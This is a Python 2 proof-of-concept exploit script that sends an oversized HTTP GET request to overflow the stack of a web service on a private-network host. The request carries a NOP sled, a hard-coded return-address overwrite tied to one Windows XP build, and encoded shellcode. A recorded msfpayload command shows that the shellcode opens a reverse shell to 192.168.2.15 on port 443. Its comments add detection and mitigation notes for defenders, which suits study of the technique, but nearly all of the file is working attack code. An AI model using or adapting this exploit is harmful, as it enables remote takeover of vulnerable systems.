#!/usr/bin/python
# Proof-of-concept stack overflow against an HTTP service on a LAN host: one
# oversized GET request line (about 2.1 KB, mostly 0x90 bytes, followed by a
# 4-byte return-address overwrite and an encoded payload) is sent over a plain
# TCP connection, which is then closed. Relies on Python 2 str-as-bytes
# semantics (socket.send() is handed a str).
#
# Defender notes:
#  - The request line is far longer than any legitimate GET and consists
#    almost entirely of non-printable bytes; request-line length limits at the
#    server/proxy and NOP-sled (long 0x90 run) signatures on the wire flag it.
#  - The overwrite is a fixed module address that the author's own comment
#    ties to one OS/service-pack build; on any other build the address does
#    not line up, and patching the vulnerable service removes the overflow.
#  - Per the payload build line recorded below, the payload connects back to
#    192.168.2.15 on port 443; outbound egress filtering and monitoring on the
#    target network catch that stage even if the overflow succeeds.
import socket

# Target of the request; RFC 1918 (private lab) address and the HTTP port.
target_address="192.168.2.7"
target_port=80

# Request line layout: "GET " + filler + EIP overwrite + pad + payload.
buffer = "GET "
# 1787 bytes of 0x90 (x86 NOP): filler that precedes the 4-byte overwrite below.
buffer+= "\x90" * 1787
buffer+= "\xF3\x30\x9D\x7C" # EIP Overwrite. Shell32.dll, XP SP2, JMP ESP, 7C9D30F3.
# Author's record of how the payload bytes below were generated: a reverse TCP
# shell encoded with shikata_ga_nai so the output contains no 0x00/0x0a/0x0d
# (bytes the HTTP parser would treat as terminators); stated size 342 bytes.
# msfpayload windows/shell_reverse_tcp LHOST=192.168.2.15 LPORT=443 R | msfencode -a x86 -b '\x00\x0a\x0d' -t c - x86/shikata_ga_nai 342 bytes
# 16 further NOP bytes between the overwritten return address and the payload.
buffer+= "\x90" * 16
# Encoded payload bytes exactly as emitted by the build line above.
buffer+= ("\xdb\xdd\xd9\x74\x24\xf4\x2b\xc9\xb1\x4f\x58\xba\x2c\x98\x23" "\x31\xc9\xba\xb6\x11\x96\xe7\xd9\xc5\xd9\x74\x24\xf4\x5e\xb1" "\x4f\x31\x56\x13\x03\x56\x13\x83\xee\xfc\xe2\x43\xed\x7e\x6e"
"\xab\x0e\x7f\x11\x22\xeb\x4e\x03\x50\x7f\xe2\x93\x13\x2d\x0f"
"\x5f\x71\xc6\x84\x2d\x5d\xe9\x2d\x9b\xbb\xc4\xae\x2d\x03\x8a"
"\x6d\x2f\xff\xd1\xa1\x8f\x3e\x1a\xb4\xce\x07\x47\x37\x82\xd0"
"\x03\xea\x33\x55\x51\x37\x35\xb9\xdd\x07\x4d\xbc\x22\xf3\xe7"
"\xbf\x72\xac\x7c\xf7\x6a\xc6\xdb\x27\x8a\x0b\x38\x1b\xc5\x20"
"\x8b\xe8\xd4\xe0\xc5\x11\xe7\xcc\x8a\x2c\xc7\xc0\xd3\x69\xe0"
"\x3a\xa6\x81\x12\xc6\xb1\x52\x68\x1c\x37\x46\xca\xd7\xef\xa2"
"\xea\x34\x69\x21\xe0\xf1\xfd\x6d\xe5\x04\xd1\x06\x11\x8c\xd4"
"\xc8\x93\xd6\xf2\xcc\xf8\x8d\x9b\x55\xa5\x60\xa3\x85\x01\xdc"
"\x01\xce\xa0\x09\x33\x8d\xac\xfe\x0e\x2d\x2d\x69\x18\x5e\x1f"
"\x36\xb2\xc8\x13\xbf\x1c\x0f\x53\xea\xd9\x9f\xaa\x15\x1a\xb6"
"\x68\x41\x4a\xa0\x59\xea\x01\x30\x65\x3f\x85\x60\xc9\x90\x66"
"\xd0\xa9\x40\x0f\x3a\x26\xbe\x2f\x45\xec\xc9\x77\xd1\xcf\x62"
"\x75\x2e\xb8\x70\x7a\x31\x83\xfc\x9c\x5b\xe3\xa8\x37\xf3\x9a"
"\xf0\xcc\x62\x62\x2f\x44\x07\xf1\xb4\x95\x4e\xea\x62\xc1\x07"
"\xdc\x7a\x87\xb5\x47\xd5\xba\x44\x11\x1e\x7e\x92\xe2\xa1\x7e"
"\x57\x5e\x86\x90\xa1\x5f\x82\xc4\x7d\x36\x5c\xb3\x3b\xe0\x2e"
"\x6d\x95\x5f\xf9\xf9\x60\xac\x3a\x7c\x6d\xf9\xcc\x60\xdf\x54"
"\x89\x9f\xef\x30\x1d\xe7\x12\xa1\xe2\x32\x97\xd1\xa8\x1f\xb1"
"\x79\x75\xca\x80\xe7\x86\x20\xc6\x11\x05\xc1\xb6\xe5\x15\xa0"
"\xb3\xa2\x91\x58\xc9\xbb\x77\x5f\x7e\xbb\x5d\x55")
# Closes the request line and sends an empty header block so the server parses it.
buffer+= " HTTP/1.1\r\n\r\n"

# Plain IPv4 TCP connection to the target.
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# socket.connect() returns None; the assignment to `connect` is never used.
connect=sock.connect((target_address,target_port))
# The whole request is handed to a single send(); nothing is read back.
sock.send(buffer)
sock.close()